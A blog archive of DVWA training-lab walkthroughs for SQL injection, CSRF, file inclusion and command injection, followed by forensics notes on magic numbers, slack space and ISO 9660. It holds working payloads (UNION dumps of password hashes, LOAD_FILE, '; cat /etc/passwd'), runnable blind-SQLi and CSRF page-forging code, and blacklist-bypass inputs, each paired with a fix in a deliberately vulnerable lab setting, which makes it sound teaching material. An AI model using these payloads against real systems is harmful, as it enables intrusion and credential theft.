Thursday, 19 July 2012

DVWA SQL Injection LOW Level


1. Input 1 for the user id and hit submit to see the result.



When you hit submit, the query SELECT first_name, last_name FROM users WHERE user_id = '1'; is sent to the database, the database returns a first_name of admin and a last_name of admin, and the page displays that to you.

2. Let's check how the form handler treats quotes by entering O'brien and hitting submit.



This returns an error, but the error is informative: the query accepted the O' and then choked on the brien part. In other words the single quote closed the string literal and whatever followed it was parsed as SQL. The input is not being escaped, so we can use a single quote to break out of the quoted value.

3. Let's try a statement that is always true by entering O' or 1=1;-- and hitting submit.



Again we get an error. The -- was meant to comment out the rest of the query, but MySQL only treats -- as a comment when it is followed by whitespace; here it is immediately followed by the closing quote the form appends after user_id = ', so that quote is left dangling, which is what the extra single quote at the end of the error message shows. Let's keep trying.

4. Let's try another always-true statement, with the quotes arranged so that the form's own closing quote ends up balanced. Enter O' or ''=' and hit submit.



The same result can be obtained with 1' or '1'='1';# or anything similar that works out to be always true.



We just got a list of all of the names of users in the database. We submitted the query SELECT first_name, last_name FROM users WHERE user_id = '1' or '1'='1';#'; which says "give me the first and last names of everyone whose user_id is equal to 1 or where 1 is equal to 1" (which is always true, so every row is returned). The # symbol comments out the rest of the line, which is what the -- was meant to do; unlike --, # does not need a following space in MySQL. We can use that to build some more interesting queries and pull out additional information.

5. Let's find out how many columns the vulnerable query returns, using ORDER BY with a column position. To test for one column we can enter 1' ORDER BY 1;# and see what happens.



No error is returned, so the query returns at least 1 column.
To test for two columns we can enter 1' ORDER BY 2;# and see what happens.



Again no error is returned, so the query returns at least 2 columns.
To test for three columns we can enter 1' ORDER BY 3;# and see what happens.



Hurray, an error! ORDER BY 3 fails, so the query returns exactly two columns. Note that this counts the columns of the SELECT, not of the underlying table; it is the number that any UNION SELECT we add later has to match.

6. Now let's try to find the column names in the table. Let's start with 1' or firstname IS NULL;# and see what happens.



We get an error telling us there is no column named firstname. Let's try again with 1' or first_name IS NULL;# and see what happens. This time there is no error: the query parsed, so a column called first_name exists.



7. Let's try to find the table name. Input O' OR users.user_id IS NOT NULL;# and submit it. This returns every row of the table users whose user_id is not NULL, and the query only parses if a table called users is in scope.



This is great (and lucky): we now know that the table name is users. Had the guess been wrong, MySQL would have answered with an unknown-column error instead of rows.

8. Let's try to find the database name. First we work out how long it is, using the LIKE wildcard _, which matches exactly one character. Input O' OR database() LIKE '__';# into the field and see what happens.



This returns no results, because the database name is not 2 characters long. Let's try 3 with O' OR database() LIKE '___';# and press submit.



Still no results, so let's try 4 characters by inputting O' OR database() LIKE '____';# and submitting it.



Alright, we now know the database name is 4 characters long; let's figure out what they are. To save space I'm just going to do a few of the letters that are in the database name. Let's start by inputting O' OR database() LIKE '%W%';# and hitting submit. The % wildcard matches any run of characters, so this asks whether a W appears anywhere in the name. With MySQL's default collations LIKE is case-insensitive, so the probe cannot tell upper case from lower case.



Alright, so the query checks whether the letter W is anywhere in the database name, and we get results back because it is. Let's find the other letters: try O' OR database() LIKE '%V%';# and hit submit.



Alright, so it contains a V. Two letters left; let's do O' OR database() LIKE '%D%';# and hit submit.



And for the final letter we can do O' OR database() LIKE '%A%';# and hit submit.



Alright, so we have the letters W, V, D and A. We unscramble them and get DVWA, of course, but to confirm we can do O' OR database() LIKE 'DVWA';# and get our results. Done by hand this is a few queries; done one character position at a time with SUBSTRING() instead of %X% it is the general blind technique, and it is what you fall back on when the page shows no data and gives you only a yes/no answer.



9. Let's find out what other tables are in this database. Thanks to the SQL-92 standard (ISO 9075) this is easy: the standard defines the INFORMATION_SCHEMA views, so we can input O' UNION SELECT table_schema, table_name FROM information_schema.tables;# and hit submit to list every table the current database user can see. The UNION works because our injected SELECT returns two columns, the same number as the original query (step 5).



Well, that's a rather long list but still very useful. Let's gather some more information.

10. Let's get the database server version by issuing O' UNION ALL SELECT 1, @@version;# and hitting submit.



11. How about the current database user? Let's do O' UNION ALL SELECT system_user(), user();# and hit submit.



12. Let's try to get some password hashes to crack later. This means returning data the page was never meant to show, so we have to be a little creative with the SQL. Enter O' UNION ALL SELECT user, password FROM mysql.user;# and see what you get. This only works because the account the application connects with is allowed to read the mysql database (DVWA's default configuration connects as root); a least-privilege application account would get a permission error here.



So this query asks for all usernames and password hashes from the mysql.user table.

13. We can also read files from the server's disk. Try ' UNION ALL SELECT Load_file('/srv/dvwa-nologin/config/config.inc.php'), '1 and hit submit. The trailing '1 is there to pair up with the closing quote the form appends. LOAD_FILE() needs the database account to hold the FILE privilege and the file to be readable by the MySQL server process, which again is only true here because of the over-privileged default setup.
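The techniques of steps 5, 8 and 9 to 13 in one place, as an added example that is not part of the original post: a Python model of the low-level handler (the user input is concatenated into the query text, exactly as the PHP does) running against an in-memory SQLite database, plus attacker-side code that only sees rows-or-error, the way the page does. It counts columns with ORDER BY, dumps data with UNION, and extracts a value blind one character at a time using the LIKE/_ length probe of step 8 followed by SUBSTR. The users table and its rows are constructed for the demo, and SQLite stands in for MySQL: it has no database() or information_schema, so a subquery and sqlite_master take their place, and the comment is -- with a trailing space because SQLite does not know #. The parameterised lookup at the end is the fix.

```python
import sqlite3

# Constructed stand-in for DVWA's database: the columns the page's query uses,
# rows made up for the demo (the admin hash is md5("password"), as on a stock install).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin',  'admin',   '5f4dcc3b5aa765d61d8327deb882cf99');
INSERT INTO users VALUES (2, 'Gordon', 'Brown',   'e99a18c428cb38d5f260853678922e03');
INSERT INTO users VALUES (3, 'Hack',   'Me',      '8d3533d75ae2c3966d7e0d4fcc69216b');
INSERT INTO users VALUES (4, 'Pablo',  'Picasso', '0d107d09f5bbe40cade3de5c71e9e9b7');
INSERT INTO users VALUES (5, 'Bob',    'Smith',   '5f4dcc3b5aa765d61d8327deb882cf99');
""")

def vulnerable_lookup(user_id: str):
    """The page's handler: input is spliced into the SQL text, so a quote in it
    closes the literal and the rest is parsed as SQL.  Returns (rows, error_text);
    DVWA's low level prints the error to the user as well."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        return [], str(exc)

# ---- attacker side: everything below only sees rows-or-error ----------------
COMMENT = " -- "   # the post uses '#'; on MySQL '--' also needs the trailing space

def is_true(condition: str) -> bool:
    """Boolean oracle (step 8): 'x' matches no user, so rows come back only if
    the OR-ed condition is true."""
    rows, err = vulnerable_lookup(f"x' OR ({condition}){COMMENT}")
    return err is None and len(rows) > 0

def count_columns(limit: int = 16) -> int:
    """Step 5: ORDER BY n errors as soon as n exceeds the SELECT's column count."""
    for n in range(1, limit + 1):
        _, err = vulnerable_lookup(f"1' ORDER BY {n}{COMMENT}")
        if err is not None:
            return n - 1
    raise RuntimeError("column count exceeds probe limit")

def union_extract(exprs, table: str):
    """Steps 9-13: a UNION whose SELECT has as many columns as the original."""
    if len(exprs) != count_columns():
        raise ValueError("UNION column count must match the original query")
    rows, err = vulnerable_lookup(f"x' UNION SELECT {', '.join(exprs)} FROM {table}{COMMENT}")
    if err is not None:
        raise RuntimeError(err)
    return rows

def blind_extract(expr: str, alphabet: str, max_len: int = 64) -> str:
    """Step 8 generalised: length first (LIKE with one '_' per character), then
    each position with SUBSTR.  On MySQL use SUBSTRING() and e.g. database()."""
    length = next((n for n in range(1, max_len + 1)
                   if is_true(f"{expr} LIKE '{'_' * n}'")), None)
    if length is None:
        raise RuntimeError("value longer than max_len, or not matchable")
    out = ""
    for pos in range(1, length + 1):
        out += next((c for c in alphabet
                     if is_true(f"SUBSTR({expr}, {pos}, 1) = '{c}'")), "?")
    return out

def safe_lookup(user_id: str):
    """The fix: a bound parameter is data and is never parsed as SQL."""
    return conn.execute("SELECT first_name, last_name FROM users WHERE user_id = ?",
                        (user_id,)).fetchall()

def demo():
    tables = [r[0] for r in union_extract(["name", "sql"], "sqlite_master")]
    hashes = dict(union_extract(["first_name", "password"], "users"))
    admin_hash = blind_extract("(SELECT password FROM users WHERE user_id = 1)",
                               "0123456789abcdef")
    return count_columns(), tables, hashes, admin_hash

if __name__ == "__main__":
    print(vulnerable_lookup("1' OR '1'='1"))   # every user, as in step 4
    print(demo())
    print(safe_lookup("1' OR '1'='1"))         # []: the payload is just an odd user id now
```

The blind extraction of a 32-character hash costs a few hundred queries here, which is why real tools binary-search the character with comparisons instead of trying each letter; the oracle function is the only piece that changes between the two.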



That is as far as I got; I have not tried anything beyond this.
Thanks.
(Good luck.)

Wednesday, 30 May 2012

DVWA CSRF (Cross Site Request Forgery) LOW Level


Cross Site Request Forgery is very dangerous and also quite common. OWASP describes it as:

 Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf, like change the victim's e-mail address, home address, or password, or purchase something. CSRF attacks generally target functions that cause a state change on the server but can also be used to access sensitive data.

1. Go to the CSRF page in DVWA and change the admin password by entering a password in the New password and Confirm new password fields and clicking the Change button.



Notice that the page keeps loading but never completes. That is because Burp Suite's intercepting proxy is holding the request; we need to tell Burp to forward it so the request can finish.

2. Go to Burp Suite, click the Proxy tab, view the password-change HTTP request and forward it. You will then see that your password has changed on the DVWA site.




Now the part we are interested in is the beginning of the HTTP request, which looks something like:

http://localhost/dvwa/vulnerabilities/csrf/?password_new=admin&password_conf=password&Change=Change

Everything needed to change the password travels in the query string of a GET request, and nothing in it (no random token, no re-entry of the current password) ties the request to the session that made it. The browser will attach the DVWA session cookie to any request for that URL, whoever caused it.

Now all we have to do is construct a link that performs the same request and hide it in some HTML, so the victim doesn't notice it happening while logged in to DVWA.
I stopped here; if anyone wants to continue, please do.
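The next step described above, as an added example that is not part of the original post: the forged page an attacker would host, built from the URL captured in Burp, together with a Python model of the DVWA handler in its low-level form and with the synchronizer-token fix. The session store, the handler names and the token parameter name user_token are assumptions for the demo; DVWA's real code is PHP.

```python
import hmac
import re
import secrets
from urllib.parse import parse_qs, urlsplit

# The request captured in Burp (copied from the post): every parameter travels in
# the query string and nothing in it is bound to the victim's session.
CAPTURED_URL = ("http://localhost/dvwa/vulnerabilities/csrf/"
                "?password_new=admin&password_conf=password&Change=Change")

def forged_url(captured: str, new_password: str) -> str:
    """Same endpoint and parameter names, attacker-chosen values."""
    base = captured.split("?", 1)[0]
    return f"{base}?password_new={new_password}&password_conf={new_password}&Change=Change"

def forged_page(captured: str, new_password: str) -> str:
    """Attacker's HTML: a zero-size image whose src replays the request.  The
    victim's browser sends the DVWA session cookie along with it automatically."""
    return ('<html><body><p>Nothing to see here.</p>'
            f'<img src="{forged_url(captured, new_password)}" width="0" height="0" alt="">'
            '</body></html>')

def image_requests(html: str):
    """The URLs a browser fetches when it renders the page."""
    return re.findall(r'<img[^>]+src="([^"]+)"', html)

# ---- server side model (assumed names) ---------------------------------------
SESSIONS = {}                      # session id -> {"user": ..., "csrf_token": ...}
PASSWORDS = {"admin": "password"}

def new_session(user: str) -> str:
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_hex(32)}
    return sid

def vulnerable_change(sid: str, url: str) -> bool:
    """Low level: a valid session cookie is all that is checked, and GET is accepted."""
    params = {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}
    if sid not in SESSIONS or params.get("Change") != "Change":
        return False
    if params.get("password_new") != params.get("password_conf"):
        return False
    PASSWORDS[SESSIONS[sid]["user"]] = params["password_new"]
    return True

def hardened_change(sid: str, method: str, form: dict) -> bool:
    """Fix: state changes only via POST, and only with the per-session token the
    server embedded in its own form.  A page on another origin cannot read that
    token, so a forged request cannot carry it."""
    if method != "POST" or sid not in SESSIONS:
        return False
    if not hmac.compare_digest(form.get("user_token", ""), SESSIONS[sid]["csrf_token"]):
        return False
    if form.get("password_new") != form.get("password_conf"):
        return False
    PASSWORDS[SESSIONS[sid]["user"]] = form["password_new"]
    return True

def demo():
    PASSWORDS["admin"] = "password"
    sid = new_session("admin")                       # the victim is logged in
    attack = image_requests(forged_page(CAPTURED_URL, "pwned"))[0]
    pwned = vulnerable_change(sid, attack)           # True: password is now "pwned"
    blocked = not hardened_change(sid, "GET",
                                  {"password_new": "pwned", "password_conf": "pwned"})
    legit = hardened_change(sid, "POST",
                            {"password_new": "s3cret", "password_conf": "s3cret",
                             "user_token": SESSIONS[sid]["csrf_token"]})
    return pwned, blocked, legit, PASSWORDS["admin"]

if __name__ == "__main__":
    print(forged_page(CAPTURED_URL, "pwned"))
    print(demo())                                    # (True, True, True, 's3cret')
```

The token comparison uses hmac.compare_digest so that a wrong token takes the same time to reject as a nearly right one. Requiring the current password on the change form, or a SameSite cookie attribute, are additional layers; neither replaces the token.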



Sunday, 27 May 2012

DVWA-FILE INCLUSION : LOW Level

File Inclusion (FI) is a type of vulnerability most often found in web applications. It allows an attacker to include a local file, usually through a script on the web server. The vulnerability occurs because user-supplied input is used as a file name without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity.

1.) Open a browser and go to the DVWA login page (http://localhost/dvwa/Login.php).


2.) Enter Username: admin and Password: password, then click Login.


3.) Go to the DVWA Security page and change the Script Security setting from high to low.


4.) Go to the File Inclusion page of DVWA and we will get started.


5.) Click the View Source button to see what the File Inclusion source looks like; this gives us an idea of how it works and what we can do.


Now we can see that the value of the page parameter is passed straight to include() with no filtering at all, so let's try some things out.

6.) Change the URL from http://localhost/dvwa/vulnerabilities/fi/?page=include.php to http://localhost/dvwa/vulnerabilities/fi/?page=/etc/passwd and see what happens.


As you can see, we get the contents of the passwd file along with a few error messages. We now know the name of every account on the local system (the shell field shows which of them can actually log in), but what about all of the groups that exist?

7.) Again change the URL, this time to http://localhost/dvwa/vulnerabilities/fi/?page=/etc/group, and see what happens.


Again, we get the contents of the group file and some error messages. We could view the contents of any file the web server process has read access to, which on this install includes DVWA's own configuration. If the server were also configured to allow remote includes (PHP's allow_url_include setting), we could point the same parameter at a file or page on another web server, and PHP would fetch and execute it.
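The two requests above and the fix for them, as an added example that is not code from the original post or from DVWA: a Python model of include($_GET['page']) that resolves the parameter the way PHP does (an absolute path as-is, a relative one against the script's own directory), beside a hardened version that only serves an allowlist of names and checks that the resolved path stays inside the script directory. The miniature filesystem, the file contents and the allowlist are constructed for the demo; the absolute path is re-rooted under a temporary directory so the example never touches the real /etc/passwd.

```python
import os
import tempfile

def build_sandbox() -> str:
    """Constructed miniature filesystem: a fake / with etc/passwd, and the DVWA
    script directory vulnerabilities/fi containing include.php."""
    root = tempfile.mkdtemp(prefix="fi_demo_")
    os.makedirs(os.path.join(root, "etc"))
    os.makedirs(os.path.join(root, "vulnerabilities", "fi"))
    with open(os.path.join(root, "etc", "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n"
                "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n")
    with open(os.path.join(root, "vulnerabilities", "fi", "include.php"), "w") as f:
        f.write("<?php echo 'This is the include page'; ?>\n")
    return root

def vulnerable_include(root: str, page: str) -> str:
    """Low level: include($_GET['page']) with no filtering.  An absolute path is
    taken as-is (here re-rooted under the sandbox), a relative one is resolved
    against the script's directory, so ../ walks out of it."""
    script_dir = os.path.join(root, "vulnerabilities", "fi")
    if page.startswith("/"):
        path = os.path.join(root, page.lstrip("/"))
    else:
        path = os.path.join(script_dir, page)
    with open(path) as f:
        return f.read()

ALLOWED_PAGES = {"include.php", "file1.php", "file2.php", "file3.php"}   # assumed allowlist

def hardened_include(root: str, page: str) -> str:
    """Fix: exact-match allowlist, plus a realpath check that the resolved file
    still lies inside the script directory (defence in depth against a later
    mistake in the allowlist or a symlink planted in the directory)."""
    script_dir = os.path.realpath(os.path.join(root, "vulnerabilities", "fi"))
    if page not in ALLOWED_PAGES:
        raise PermissionError(f"page {page!r} is not an allowed include")
    path = os.path.realpath(os.path.join(script_dir, page))
    if os.path.commonpath([script_dir, path]) != script_dir:
        raise PermissionError("resolved path escapes the script directory")
    with open(path) as f:
        return f.read()

def demo():
    root = build_sandbox()
    leaked = {
        "absolute":  vulnerable_include(root, "/etc/passwd"),        # the post's request
        "traversal": vulnerable_include(root, "../../etc/passwd"),   # same file via ../
    }
    blocked = []
    for page in ("/etc/passwd", "../../etc/passwd", "include.php"):
        try:
            hardened_include(root, page)
        except PermissionError:
            blocked.append(page)
    return root, leaked, blocked

if __name__ == "__main__":
    root, leaked, blocked = demo()
    print(leaked["traversal"].splitlines()[0])   # root:x:0:0:root:/root:/bin/bash
    print(blocked)                               # ['/etc/passwd', '../../etc/passwd']
```

A remote include (page=http://...) needs allow_url_include=On on top of the missing validation; the allowlist stops it for the same reason it stops the traversal, because the value is compared as a name rather than used as a path.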


DVWA COMMAND EXECUTION : LOW Level

1.) Open a browser and go to the DVWA login page (http://localhost/dvwa/Login.php).



2.) Enter Username: admin and Password: password, then click Login.



3.) Go to the DVWA Security page and change the Script Security setting from high to low.



4.) Go to the Command Execution page in DVWA and try it out to see what it does.



Based on the response, we can work out that when we enter an IP address and press submit, the server runs the command ping -c 3 192.168.1.1 and shows us its output. Now let's experiment and see what else we can get out of the server.

5.) Next we try the input 192.168.1.1 ; ls and see what happens.



Great! First we get the same ping output, but after it we also get the output of the ls command, which shows two folders, help and source, and one file, index.php, in the directory where the commands are being executed. The ; ended the ping command and the shell ran ours next.

6.) Let's find out where these commands are running, and therefore where the files we just found are located, by submitting ; pwd and reviewing the results.



Now we can see that the commands are being executed in the /srv/dvwa-nologin/vulnerabilities/exec directory, and this is also where our files are located.

7.) Let's find out which user we are executing commands as, and what processes are running on the machine, by submitting ; whoami ; ps and viewing the results.



Now we can see that we are executing commands as the www-data user, and we get the list of processes running on the machine.

8.) Let's see who is able to log in to this machine with ; cat /etc/passwd (the account names could later be used to brute-force passwords and gain superuser access).



The /etc/passwd file is a text-based database of information about users that may login to the system or other operating system user identities that own running processes.

If you go to the links listed under More info you can try out some more commands. This is just a sample of the many things that could be done.

Now lets check the source code of the vulnerable file:


High Command Execution Source
<?php

if( isset( $_POST[ 'submit' ] ) ) {

    $target = $_REQUEST["ip"];

    $target = stripslashes( $target );

    // Split the IP into 4 octets
    $octet = explode(".", $target);

    // Check IF each octet is an integer
    if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4) ) {

        // If all 4 octets are ints, put the IP back together.
        $target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3];

        // Determine OS and execute the ping command.
        if (stristr(php_uname('s'), 'Windows NT')) {

            $cmd = shell_exec( 'ping ' . $target );
            echo '<pre>'.$cmd.'</pre>';

        } else {

            $cmd = shell_exec( 'ping -c 3 ' . $target );
            echo '<pre>'.$cmd.'</pre>';

        }

    }

    else {
        echo '<pre>ERROR: You have entered an invalid IP</pre>';
    }

}

?>


Medium Command Execution Source
<?php

if( isset( $_POST[ 'submit'] ) ) {

    $target = $_REQUEST[ 'ip' ];

    // Remove any of the characters in the array (blacklist).
    $substitutions = array(
        '&&' => '',
        ';'  => '',
    );

    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if (stristr(php_uname('s'), 'Windows NT')) {

        $cmd = shell_exec( 'ping ' . $target );
        echo '<pre>'.$cmd.'</pre>';

    } else {

        $cmd = shell_exec( 'ping -c 3 ' . $target );
        echo '<pre>'.$cmd.'</pre>';

    }

}

?>


Low Command Execution Source
<?php

if( isset( $_POST[ 'submit' ] ) ) {

    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if (stristr(php_uname('s'), 'Windows NT')) {

        $cmd = shell_exec( 'ping ' . $target );
        echo '<pre>'.$cmd.'</pre>';

    } else {

        $cmd = shell_exec( 'ping -c 3 ' . $target );
        echo '<pre>'.$cmd.'</pre>';

    }

}

?>
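The three handlers above side by side, as an added example that is not the page's code: a Python model of the Low concatenation, the Medium blacklist (applied in order, as PHP's str_replace() does with arrays) and a fixed version that validates the input as an IP address and runs the command without a shell. The model runs the injected inputs from steps 5 to 8 against each. echo stands in for ping so the demo needs neither network nor raw sockets; the command string is otherwise built exactly as the PHP builds it. The marker command and the function names are assumptions for the demo.

```python
import ipaddress
import subprocess

def run_shell(cmdline: str) -> str:
    """shell_exec() equivalent: the whole string is handed to /bin/sh."""
    return subprocess.run(cmdline, shell=True, capture_output=True, text=True).stdout

def low_ping(target: str) -> str:
    """Low level: plain concatenation, so every shell metacharacter is honoured."""
    return run_shell("echo ping -c 3 " + target)

def medium_ping(target: str) -> str:
    """Medium level: the page's blacklist, applied in order.  '|' is not on the
    list at all, and '&;&' turns into '&&' once the ';' has been removed."""
    for bad in ("&&", ";"):
        target = target.replace(bad, "")
    return run_shell("echo ping -c 3 " + target)

def safe_ping(target: str) -> str:
    """Fix: parse the input as an IP address (anything else raises ValueError)
    and pass it as its own argv element, with no shell in the way."""
    ip = ipaddress.ip_address(target.strip())
    argv = ["echo", "ping", "-c", "3", str(ip)]          # echo stands in for ping
    return subprocess.run(argv, capture_output=True, text=True).stdout

MARKER = "printf INJECTED"   # prints a line that is exactly INJECTED only if it runs

def executed(output: str) -> bool:
    """True if the injected command ran, rather than merely being echoed as text."""
    return "INJECTED" in output.splitlines()

def demo() -> dict:
    results = {
        "low ;":      executed(low_ping(f"127.0.0.1; {MARKER}")),        # injected
        "medium ;":   executed(medium_ping(f"127.0.0.1; {MARKER}")),     # blacklist holds
        "medium |":   executed(medium_ping(f"127.0.0.1 | {MARKER}")),    # bypass
        "medium &;&": executed(medium_ping(f"127.0.0.1 &;& {MARKER}")),  # bypass
    }
    try:
        safe_ping(f"127.0.0.1; {MARKER}")
        results["safe ;"] = True
    except ValueError:
        results["safe ;"] = False                                        # rejected
    return results

if __name__ == "__main__":
    for case, ran in demo().items():
        print(f"{case:12s} injected command ran: {ran}")
    print(safe_ping("127.0.0.1").strip())        # ping -c 3 127.0.0.1
```

The High level on the page takes a different route to the same place: rebuilding the value from four numeric octets leaves nothing for the shell to interpret. Either way the rule is that the input must be reduced to the one type of value the command expects before it is used; stripping a list of bad characters never achieves that.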

Sunday, 18 March 2012

Magic Number


1. In source code, a non-obvious constant whose value is significant to the operation of a program and that is inserted inconspicuously in-line (hardcoded), rather than being given a symbolic name by a commented #define. Magic numbers in this sense are bad style.

2. A number that encodes critical information used in an algorithm in some opaque way. The classic examples are the numbers used in hash or CRC functions, or the coefficients in a linear congruential generator for pseudo-random numbers. This sense actually predates, and was ancestral to, the more common sense 1.

3. Special data located at the beginning of a binary data file to indicate its type to a utility. Under Unix, the system and various application programs (especially the linker) distinguish between types of executable file by looking for a magic number. Once upon a time, these magic numbers were PDP-11 branch instructions that skipped over header data to the start of executable code; 0407, for example, was octal for 'branch 16 bytes relative'. Many other kinds of files now have magic numbers somewhere; some magic numbers are, in fact, strings, like the !<arch> at the beginning of a Unix archive file or the %! leading PostScript files. Nowadays only a wizard knows the spells to create magic numbers. How do you choose a fresh magic number of your own? Simple: you pick one at random. See? It's magic!

4. An input that leads to a computational boundary condition, where algorithm behavior becomes discontinuous. Numeric overflows (particularly with signed data types) and run-time errors (divide by zero, stack overflows) are indications of magic numbers. The Y2K scare was probably the most notorious magic number non-incident.

The magic number, on the other hand, is 7 ± 2. See "The magical number seven, plus or minus two: some limits on our capacity for processing information" by George Miller, in the Psychological Review 63:81-97 (1956). This classic paper established the number of distinct items (such as numeric digits) that humans can hold in short-term memory. Among other things, this strongly influenced the interface design of the phone system.

Unallocated space

Unallocated space, sometimes called "free space", is logical space on a hard drive that the operating system (e.g. Windows) can write to. Put another way, it is the opposite of "allocated" space, which is where the operating system has already written files.

Examples.

If the operating system writes a file to a certain area of the hard drive, that part of the drive is now "allocated": the file is using the space, and no other file can be written to that section. If that file is deleted, that part of the hard drive no longer needs to be "allocated" and becomes unallocated again. This means that new files can now be written to that location.

On a standard, working computer, files can only be written to the unallocated space.

If a newly formatted drive is connected to a computer, virtually all of the drive is unallocated space (a small amount is taken up by the file system's own structures, e.g. $MFT on NTFS). On a new drive the unallocated space is normally all zeros; as files are written to the drive the zeros are overwritten with file data.

Working Example

Blank Drive

A freshly formatted (NTFS) 500 GB hard drive starts with 99.9% unallocated space; we will assume it's 100% to make the maths slightly easier. All of the unallocated space will be zeros, literally 00 00 00 written on the platters.

If a 5 GB file, e.g a large movie, is placed on the drive, then there will be 1% (5 GB)  allocated space and 99% unallocated (495 GB)

If a 10 GB database file is now added to this hard drive there will be a total of 3% (15 GB) of allocated space and 485 GB unallocated space. New files will only be written into the remaining unallocated space.

What happens when a file is deleted

If the movie file from the above example is deleted, the allocated space it was using becomes unallocated again, i.e. there will now be 2% allocated space (the 10 GB database) and 98% unallocated space.

However, the data of the movie file is still on the hard drive; it does not just disappear, only its status changes. This means that the following situation now exists:

There is 10 GB of allocated space and 490 GB of unallocated space.

Of the 490 GB, 485 GB would still be zeros, but 5 GB of the unallocated space would be the old movie data.

Until new files are written to the hard drive, the movie file remains deleted but recoverable. Even when new files are written, the movie is only destroyed once they land on the same unallocated space it occupied, and a partial overwrite leaves the rest of it behind. (This reasoning applies to spinning disks; on SSDs the TRIM command can let the drive discard deleted blocks much sooner.)

slack space

Slack space is the unused space in a disk cluster. The DOS and Windows file systems use fixed-size clusters. Even if the actual data being stored requires less storage than the cluster size, an entire cluster is reserved for the file. The unused space is called the slack space.
DOS and older Windows systems use a 16-bit file allocation table (FAT), which results in very large cluster sizes for large partitions. For example, if the partition size is 2 GB, each cluster will be 32 KB. Even if a file requires only 4 KB, the entire 32 KB will be allocated, resulting in 28 KB of slack space. Windows 95 OSR2 and Windows 98 resolve this problem by using a 32-bit FAT (FAT32) that supports cluster sizes smaller than 1 KB. Forensically, slack space matters because it is not cleared when a file is written: whatever occupied those bytes before, often the tail of an earlier, deleted file, stays readable there.
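The three ideas above (magic numbers in sense 3, data surviving in unallocated space, and slack) put to work, as an added example that is not part of the original post: a Python file-type identifier driven by magic bytes, a simple header/trailer carver that recovers deleted files from a raw image regardless of what the file system still says about them, and the slack calculation from the FAT16 example. The signature table, the disk image, its cluster size and the "deleted" files in it are constructed for the demo.

```python
# Magic numbers (sense 3): the leading bytes that identify a file type, paired
# with the trailer a carver can use to find where the file ends (None if the
# format has no fixed trailer).  Longer signatures come first so that the
# two-byte ones ("MZ", "%!") cannot shadow them.
SIGNATURES = [
    ("png",        b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),
    ("ar",         b"!<arch>\n",         None),
    ("pdf",        b"%PDF-",             b"%%EOF"),
    ("elf",        b"\x7fELF",           None),
    ("jpeg",       b"\xff\xd8\xff",      b"\xff\xd9"),
    ("gzip",       b"\x1f\x8b",          None),
    ("pe",         b"MZ",                None),
    ("postscript", b"%!",                None),
]

def identify(data: bytes) -> str:
    """Classify by magic bytes, never by file extension.  Two-byte magics such
    as MZ give false positives on text that happens to start with them, so a
    real tool confirms with structure checks (e.g. the PE header offset)."""
    for name, head, _ in SIGNATURES:
        if data.startswith(head):
            return name
    return "unknown"

def carve(image: bytes):
    """Scan a raw image, unallocated space included, for header/trailer pairs
    and return (type, offset, bytes) for each hit in offset order.  Deleted
    files are found here for as long as nothing has been written over them."""
    found = []
    for name, head, tail in SIGNATURES:
        if tail is None:
            continue
        pos = 0
        while (start := image.find(head, pos)) != -1:
            end = image.find(tail, start + len(head))
            if end == -1:
                break                      # header without trailer: truncated/overwritten
            end += len(tail)
            found.append((name, start, image[start:end]))
            pos = end
    return sorted(found, key=lambda hit: hit[1])

def slack_bytes(file_size: int, cluster_size: int) -> int:
    """Unused bytes in the last cluster allocated to a file (file slack)."""
    return (-file_size) % cluster_size

CLUSTER = 512   # small cluster so the constructed image stays tiny

def build_image() -> bytes:
    """Constructed disk image: one live text file, then a PNG and a PDF whose
    directory entries have been 'deleted' while their bytes are still in place."""
    png = (SIGNATURES[0][1] + b"\x00\x00\x00\rIHDR" + b"\x00" * 17
           + b"\x00\x00\x00\x00IDAT" + b"\x11" * 40 + b"\x00\x00\x00\x00"
           + SIGNATURES[0][2])
    pdf = b"%PDF-1.4\n1 0 obj << >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF"
    image = bytearray(CLUSTER * 32)                     # 16 KiB of zeros to start
    image[0:5] = b"hello"                               # allocated file in cluster 0
    image[2 * CLUSTER:2 * CLUSTER + len(png)] = png     # deleted PNG in cluster 2
    image[9 * CLUSTER:9 * CLUSTER + len(pdf)] = pdf     # deleted PDF in cluster 9
    return bytes(image)

if __name__ == "__main__":
    for kind, offset, blob in carve(build_image()):
        print(kind, "at byte", offset, "length", len(blob),
              "slack in its last cluster:", slack_bytes(len(blob), CLUSTER))
    print(slack_bytes(4 * 1024, 32 * 1024))            # 28672: the article's FAT16 case
```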

The ISO 9660 File System

This article describes the ISO 9660 file system format used on compact disc read-only memory (CD-ROM). CD-ROMs have become so popular (and cheap) that their market share has grown exponentially over the last few years. It is therefore worthwhile to examine the file system used on CD-ROMs. What makes it different from other file systems such as the UNIX File System (UFS) used on e.g. SunOS systems?

Introduction
The audio compact disc is only a decade old, but surprisingly enough it has pushed vinyl records completely out of the market. It was in the early 1980s that Philips and Sony introduced the Compact Disc Digital Audio (CD-DA) standard, better known as the Red Book standard.
It was also Philips and Sony who introduced, in 1984, the CD-ROM (Compact Disc Read Only Memory) standard, commonly known as the Yellow Book standard.
The computer industry immediately saw the benefits of CD-ROMs, namely:
· cheaper in production than tapes
· cheaper in shipping to customers
· less vulnerable to dust, fingerprints, magnetic fields than tapes
· large capacity, more than 600 Mbytes
· cannot be overwritten by accident, because it is a read-only medium
Therefore, it did not take long before the CD-ROM became quite popular among developers and customers.
